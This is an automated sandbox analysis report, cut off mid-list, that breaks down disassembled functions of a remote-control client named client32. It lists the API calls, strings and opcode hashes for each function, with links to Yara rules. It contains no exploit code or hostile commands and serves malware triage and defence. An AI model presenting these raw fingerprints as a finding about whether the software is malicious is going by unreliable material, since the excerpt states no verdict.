                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                                                                              • API String ID: 4241058051-934300333
                                                                                                                              • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                              • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                                                                              • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                                                                              • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 111442D0 Relevance: 12.1, APIs: 8, Instructions: 85COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000000,?,775EC740), ref: 111442F0
                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11144303
                                                                                                                              • GetFileVersionInfoSizeA.VERSION(?,?), ref: 11144323
                                                                                                                              • _malloc.LIBCMT ref: 1114432F
                                                                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                                              • GetFileVersionInfoA.VERSION(?,?,00000000,00000000,?), ref: 1114434D
                                                                                                                              • _free.LIBCMT ref: 1114435D
                                                                                                                                • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
                                                                                                                                • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                                              • VerQueryValueA.VERSION(?,1119A5BC,?,?,?,?,00000000,00000000,?), ref: 1114438E
                                                                                                                              • _free.LIBCMT ref: 111443B1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$HeapInfoModuleVersion_free$AllocateErrorFreeHandleLastNameQuerySizeValue_malloc
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1929493397-0
                                                                                                                              • Opcode ID: b688c16def8b645aa007769c5559b4416277e7eb52f4bfe7b86313bc47a47bad
                                                                                                                              • Instruction ID: 533d070b008c48d0019e4fafecd2d90481fbd6e663e37e79b598d21e300b118d
                                                                                                                              • Opcode Fuzzy Hash: b688c16def8b645aa007769c5559b4416277e7eb52f4bfe7b86313bc47a47bad
                                                                                                                              • Instruction Fuzzy Hash: 242161769001299BDB14DF64DC44EDEF3BCEF58714F004199E94997200DAB1AE94CF90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018915,30AC22AD,?,?,?,1117EE88,000000FF), ref: 110DEB61
                                                                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                                              • std::exception::exception.LIBCMT ref: 1101B776
                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                                                                              • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                                                                              Strings
                                                                                                                              • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                                                                              • NSSecurity.dll, xrefs: 1101B7A3
                                                                                                                              • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                                                                              • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                                                                              • API String ID: 3515807602-1044166025
                                                                                                                              • Opcode ID: 79bc4a821b252fe5e853862ba44cc1783e353074726a9865c4d3412d2450f9c7
                                                                                                                              • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                                                                              • Opcode Fuzzy Hash: 79bc4a821b252fe5e853862ba44cc1783e353074726a9865c4d3412d2450f9c7
                                                                                                                              • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                                                                • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                                                                              • GetWindowLongA.USER32 ref: 110935E9
                                                                                                                              • SetWindowLongA.USER32 ref: 11093617
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • GetWindowLongA.USER32 ref: 11093640
                                                                                                                              • SetWindowLongA.USER32 ref: 1109366E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LongWindow$ErrorExitLastMessageProcessVersion_memsetwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2973435017-2830328467
                                                                                                                              • Opcode ID: 8dd860ff6da0b207b733b36cdcdcd14c85c4a95ade53ebebc91cb721ae0f49fd
                                                                                                                              • Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
                                                                                                                              • Opcode Fuzzy Hash: 8dd860ff6da0b207b733b36cdcdcd14c85c4a95ade53ebebc91cb721ae0f49fd
                                                                                                                              • Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110040F0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • EnableWindow.USER32(00000000,00000000), ref: 11004130
                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 110041A7
                                                                                                                              • InvalidateRect.USER32(00000000,00000000,00000000), ref: 110041D2
                                                                                                                              • EnableWindow.USER32(00000000,00000001), ref: 110041FE
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: EnableWindow$ErrorExitInvalidateLastMessageProcessRectwsprintf
                                                                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                              • API String ID: 2354609054-2830328467
                                                                                                                              • Opcode ID: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                                                                              • Instruction ID: c13629e3a69401f36b1837560bfd6e90eee75297420fac0ab380ec534ade091b
                                                                                                                              • Opcode Fuzzy Hash: bc77aff694d436de89820df397cf97f2537acd50e9dcce0a0b494a4fafc6c394
                                                                                                                              • Instruction Fuzzy Hash: AC318BB5A40309ABE720DF55CC86F9AF3E4FB4C708F108569E91AA7680D7B4B8008B94
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 110ED020 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsWindow.USER32(0000070B), ref: 110ED02A
                                                                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                              • LoadCursorA.USER32 ref: 110ED0B1
                                                                                                                              • SetCursor.USER32(00000000), ref: 110ED0B8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Cursor$ErrorExitLastLoadMessageProcessWindowwsprintf
                                                                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$pEnLink!=0
                                                                                                                              • API String ID: 2735369351-763374134
                                                                                                                              • Opcode ID: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                                              • Instruction ID: 1517011758136c5ff836e71d92dda8c4c85f8f681a38b9b7789002e2c31f8d4e
                                                                                                                              • Opcode Fuzzy Hash: c71bab5a9d15cfbc5a16eb7372e080607997f0f4ce03b78e9d73ef1e06305408
                                                                                                                              • Instruction Fuzzy Hash: 2F01497AE412253BD511A5537C0AFDFBB1CEF412ADF040031FD1996201F66AB11583E6
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1101E480 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$Long$FindParent
                                                                                                                              • String ID: SHELLDLL_DefView
                                                                                                                              • API String ID: 3423459710-137347452
                                                                                                                              • Opcode ID: dcd4b904aece67368dfa5784066f3ffc96a832cb2d01d307577d1b7cfe5a98ba
                                                                                                                              • Instruction ID: 8fc45930cc0220d56326dab2838ff47d33a70150a0590e1644e7061ca7e09e42
                                                                                                                              • Opcode Fuzzy Hash: dcd4b904aece67368dfa5784066f3ffc96a832cb2d01d307577d1b7cfe5a98ba
                                                                                                                              • Instruction Fuzzy Hash: 1F112736A811355BE30ADEF8DD48A2DBFD4A700338F114636F623CB5CCCE2898004354
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 11002070 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 55COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: MetricsSystem$AtomGlobal
                                                                                                                              • String ID: NSMAnnotate
                                                                                                                              • API String ID: 1775358667-1587977882
                                                                                                                              • Opcode ID: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                                                                              • Instruction ID: c7367c546af50a4de639236848e5e5652b6277b92aa1928d07c4543d278ba0f2
                                                                                                                              • Opcode Fuzzy Hash: 0ab50aaa82936b499c722e1eccc7d7de1002793e4e15bfd85b105029e2cc8b0f
                                                                                                                              • Instruction Fuzzy Hash: 2021AFB0901B549FD321DF6A8984696FBE8FFA4754F00491FD2AA87A20D7B5A440CF44
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1100B340 Relevance: 10.6, APIs: 7, Instructions: 54COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 1100B350
                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B389
                                                                                                                              • EnterCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3A8
                                                                                                                                • Part of subcall function 1100A250: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?), ref: 1100A26E
                                                                                                                                • Part of subcall function 1100A250: DeviceIoControl.KERNEL32 ref: 1100A298
                                                                                                                                • Part of subcall function 1100A250: GetLastError.KERNEL32 ref: 1100A2A0
                                                                                                                                • Part of subcall function 1100A250: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 1100A2B4
                                                                                                                                • Part of subcall function 1100A250: CloseHandle.KERNEL32(00000000), ref: 1100A2BB
                                                                                                                              • waveOutUnprepareHeader.WINMM(00000000,?,00000020,?,1100BF9B,?,00000000,00000002), ref: 1100B3B8
                                                                                                                              • LeaveCriticalSection.KERNEL32(?,?,1100BF9B,?,00000000,00000002), ref: 1100B3BF
                                                                                                                              • _free.LIBCMT ref: 1100B3C8
                                                                                                                              • _free.LIBCMT ref: 1100B3CE
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828427604.00000000111F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000111F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001125D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.0000000011288000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001129E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112AD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112B4000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.00000000112DF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828437090.000000001132B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_11000000_client32.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalSection$Enter_free$CloseControlCreateDecrementDeviceErrorEventHandleHeaderInterlockedLastLeaveObjectSingleUnprepareWaitwave
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 705253285-0
                                                                                                                              • Opcode ID: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                              • Instruction ID: 939bcaf7555c717cf87bfebf1d57658177790bd0868e621cfe44e5f8350f5b2d
                                                                                                                              • Opcode Fuzzy Hash: 9b17b99866f1eb7af8eecf8b34d72fa950e84be9354c263641cd2a407741fadc
                                                                                                                              • Instruction Fuzzy Hash: 5511C276900718ABE321CEA0DC88BEFB3ECBF48359F104519FA6692544D774B501CB64
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1116C548 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,111DD208,00000008,1116C650,00000000,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 1116C559
                                                                                                                              • __lock.LIBCMT ref: 1116C58D
                                                                                                                                • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                                                                • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                                                                • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                                                                              • InterlockedIncrement.KERNEL32(111ECF10), ref: 1116C59A
                                                                                                                              • __lock.LIBCMT ref: 1116C5AE
                                                                                                                              • ___addlocaleref.LIBCMT ref: 1116C5CC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.828190451.0000000011001000.00000020.00000001.01000000.00000006.sdmp, Offset: 11000000, based on PE: true
                                                                                                                              • Associated: 00000001.00000002.828182750.0000000011000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                              • Associated: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmpDownload File
